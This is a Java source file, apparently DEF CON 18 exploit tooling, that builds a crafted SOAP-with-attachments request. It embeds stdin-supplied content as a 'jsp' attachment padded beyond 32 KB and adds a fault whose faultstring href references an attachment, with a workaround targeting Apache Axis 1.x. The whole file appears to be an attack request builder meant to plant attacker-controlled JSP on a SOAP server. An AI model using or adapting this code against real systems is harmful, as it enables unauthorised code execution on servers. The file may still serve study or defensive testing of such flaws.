package net.darkmist.defcon18;

import java.io.IOException;
import java.io.OutputStream;
import java.util.Iterator;

import javax.xml.soap.AttachmentPart;
import javax.xml.soap.MessageFactory;
import javax.xml.soap.Name;
import javax.xml.soap.SOAPBody;
import javax.xml.soap.SOAPElement;
import javax.xml.soap.SOAPEnvelope;
import javax.xml.soap.SOAPException;
import javax.xml.soap.SOAPFault;
import javax.xml.soap.SOAPMessage;
import javax.xml.soap.SOAPPart;

import org.apache.commons.httpclient.methods.RequestEntity;
import org.apache.commons.io.IOUtils;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

public class SoapAttachment implements RequestEntity
{
	private static final Logger logger = LoggerFactory.getLogger(SoapAttachment.class);
	private static final String JSP_TYPE	= "text/plain; charset=utf-8";
	//private static final String JSP_TYPE	= "application/octet-stream";
	private static final String JSP_ID	= "jsp";
	private static final String REF_STR	= "toast is yummy\n(like cabbage)\n";
	private static final String REF_TYPE	= "text/plain; charset=utf-8";
	private static final String REF_ID	= "toast";
	private static final String SOAP_ID	= "soap";
	private static final char CHAR_PAD		= ' ';
	private static final int MIN_SIZE	= 32*1024 + 1;
	private SOAPMessage msg;

	private static String padStrToLen(String str, int min, char pad)
	{
		int diff;
		StringBuilder sb;

		diff = min - str.length();
		if(diff<0)
			return str;
		sb = new StringBuilder(min);
		sb.append(str);
		for(;diff>0;diff--)
			sb.append(pad);
		return sb.toString();
	}

	@SuppressWarnings("unchecked")
	public SoapAttachment(String content) throws IOException, SOAPException
	{
		MessageFactory mf = MessageFactory.newInstance();
		SOAPPart soapPart;
		SOAPEnvelope env;
		Name envName;
		SOAPBody body;
		AttachmentPart part;
		SOAPFault fault;
		Name faultStrName;
		Name faultCodeStrName;
		Name hrefName;
		boolean foundFaultStr = false;

		msg = mf.createMessage();
		soapPart = msg.getSOAPPart();
		soapPart.setContentId(SOAP_ID);

		// add jsp
		part = msg.createAttachmentPart();
		content = padStrToLen(content, MIN_SIZE, CHAR_PAD);
		part.setContent(content, JSP_TYPE);
		part.setContentId(JSP_ID);
		msg.addAttachmentPart(part);

		
		// add toast
		part = msg.createAttachmentPart();
		part.setContent(REF_STR, REF_TYPE);
		part.setContentId(REF_ID);
		msg.addAttachmentPart(part);

		// add fault
		env = soapPart.getEnvelope();
		envName = env.getElementName();
		faultCodeStrName = env.createName("Server.userException",envName.getPrefix(),envName.getURI());
		faultStrName = env.createName("faultstring");
		hrefName = env.createName("href");
		body = msg.getSOAPBody();

		// for stuff that has sane fault objects...
		fault = body.addFault(faultCodeStrName, "");
		for(Iterator i = fault.getChildElements(faultStrName);i.hasNext();)
		{
			Object o = i.next();
			if(!(o instanceof SOAPElement))
			{
				logger.debug("found =" + o.getClass().getName() + "= tostring=" + o.toString() + '=');
				continue;
			}
			SOAPElement faultStr = (SOAPElement)o;
			faultStr.addAttribute(hrefName,REF_ID);
			foundFaultStr = true;
		}
		if(foundFaultStr)
			logger.debug("sane fault handling worked...");
		else
		{	// insane fault objects (ie: axis 1.x)
			SOAPElement faultElement;
			SOAPElement faultCode;
			Name faultName;
			Name faultCodeName;

			// get rid of the first attempt...
			logger.debug("sane fault handling failed...removing and working around");
			fault.detachNode();
			fault = null;
			
			faultName = env.createName("Fault",envName.getPrefix(),envName.getURI());
			faultElement = body.addChildElement(faultName);

			// create the faultcode
			faultCodeName = env.createName("faultcode");
			faultCode = faultElement.addChildElement(faultCodeName);
			faultCode.addTextNode(faultCodeStrName.getQualifiedName());

			// create the faultstring
			SOAPElement faultStr = faultElement.addChildElement(faultStrName);
			faultStr.addAttribute(hrefName,REF_ID);
		}

		// save the beast...
		msg.saveChanges();
	}

	public long getContentLength()
	{
		return -1;
	}

	public String getContentType()
	{
		String[] types;
		
		types = msg.getMimeHeaders().getHeader("Content-Type");
		if(types.length != 1)
			throw new IllegalStateException("Content-Type number wasn't 1 but " + types.length);
		return types[0];
	}

	public boolean isRepeatable()
	{
		return false;
	}

	public void writeRequest(OutputStream out) throws IOException
	{
		try
		{
			msg.writeTo(out);
		}
		catch(SOAPException e)
		{
			IOException ioe = new IOException("SOAPException writing out SOAP message");
			ioe.initCause(e);
			throw ioe;
		}
	}

	public static void main(String[] args) throws IOException, SOAPException
	{
		SoapAttachment me = new SoapAttachment(IOUtils.toString(System.in));

		System.out.println("Content-Type: " + me.getContentType() + "\n");
		me.writeRequest(System.out);
		System.out.flush();
	}
}
